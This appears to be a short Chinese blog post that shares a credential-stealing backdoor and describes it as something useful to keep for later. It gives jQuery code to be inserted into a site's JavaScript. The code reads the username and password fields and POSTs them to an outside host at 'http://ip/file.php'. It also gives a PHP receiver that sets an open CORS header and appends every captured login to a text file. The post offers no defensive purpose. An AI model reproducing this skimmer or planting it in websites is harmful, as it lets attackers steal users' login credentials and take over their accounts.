朗朗 最近看到一个文章!
通过修改JS源码留个远程获取用户信息的后门,感觉挺有用的,以后应该用的上
第一部分很简单的一段js代码
function demo(){
username = $("input[name='username']").val();
password = $("input[name='password']").val();
$.ajax({
type:'post',
url:'http://ip/file.php',
async:false,
data:'user='+username+'&pass='+password,
success:function(msg){
}
});
}第二部分属于接收端的php代码
<?php
header('Access-Control-Allow-Origin:*');
$user = @$_POST['user'];
$pass = @$_POST['pass'];
echo $user; //显示接收到的数据。
$myfile = fopen("testfile.txt","a+");
fwrite($myfile, $user."---".$pass."rn");
fclose($myfile);
?>代码很简单!以后应该用的上!
